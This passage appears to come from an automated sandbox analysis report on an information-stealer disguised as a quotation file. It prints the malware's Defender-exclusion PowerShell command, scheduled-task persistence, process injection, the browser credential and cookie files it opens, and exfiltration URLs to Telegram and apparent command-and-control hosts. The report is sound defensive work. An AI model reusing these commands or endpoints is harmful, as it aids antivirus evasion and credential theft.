                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 446000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 448000Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5463008Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 446000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 448000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: B43008Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2a986a8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.28f6afc.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.2876970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1636139946.00000000068C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1660117333.0000000002849000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1632148313.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scheduled Task/Job | 311 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Scheduled Task/Job | 2 Software Packing | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 311 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  [Behavior graph: ID 1589989; Sample: QUOTATION REQUIRED_Enatel s...; Start date: 13/01/2025; Architecture: WINDOWS; Score: 100]

                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | QUOTATION REQUIRED_Enatel s.r.l..bat.exe | 39% | ReversingLabs | | |
                  | QUOTATION REQUIRED_Enatel s.r.l..bat.exe | 100% | Joe Sandbox ML | | |

                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe | 100% | Joe Sandbox ML | | |
                  | C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe | 39% | ReversingLabs | | |

                  No Antivirus matches

                  No Antivirus matches

                  | Source | Detection | Scanner | Label | Link |
                  |---|---|---|---|---|
                  | http://us2.smtp.mailhostbox.com | 0% | Avira URL Cloud | safe | |

                  | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                  |---|---|---|---|---|---|
                  | us2.smtp.mailhostbox.com | 208.91.199.223 | true | false | | high |
                  | reallyfreegeoip.org | 104.21.112.1 | true | false | | high |
                  | api.telegram.org | 149.154.167.220 | true | false | | high |
                  | checkip.dyndns.com | 132.226.8.169 | true | false | | high |
                  | 18.31.95.13.in-addr.arpa | unknown | unknown | false | | high |
                  | checkip.dyndns.org | unknown | unknown | false | | high |

                  | Name | Malicious | Antivirus Detection | Reputation |
                  |---|---|---|---|
                  | https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
                  | https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:19:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
                  | https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:09:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high |
                  | http://checkip.dyndns.org/ | false | | high |
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://www.office.com/vbc.exe, 0000000C.00000002.4058029996.00000000070F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/chrome_newtabvbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/ac/?q=vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://api.telegram.orgvbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icovbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://api.telegram.org/botQUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://us2.smtp.mailhostbox.comvbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.office.com/Pvbc.exe, 00000007.00000002.4059070573.0000000007554000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/DataSet1.xsdQUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.drfalse
                                                      high
                                                      https://www.office.com/lBvbc.exe, 00000007.00000002.4059070573.000000000755E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.00000000070FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.orgvbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=vbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20avbc.exe, 00000007.00000002.4059070573.0000000007456000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006FF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://chrome.google.com/webstore?hl=envbc.exe, 0000000C.00000002.4058029996.00000000070D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://varders.kozow.com:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://aborters.duckdns.org:8081QUOTATION REQUIRED_Enatel s.r.l..bat.exe, 00000000.00000002.1633750028.000000000382D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000007.00000002.4053742963.0000000000434000.00000040.00000400.00020000.00000000.sdmp, vTAuFgZcVE.exe, 00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.0000000006F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=vbc.exe, 00000007.00000002.4067373416.0000000008393000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4065311870.0000000007F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://51.38.247.67:8081/_send_.php?Lvbc.exe, 00000007.00000002.4059070573.00000000074EF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000C.00000002.4058029996.000000000708E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
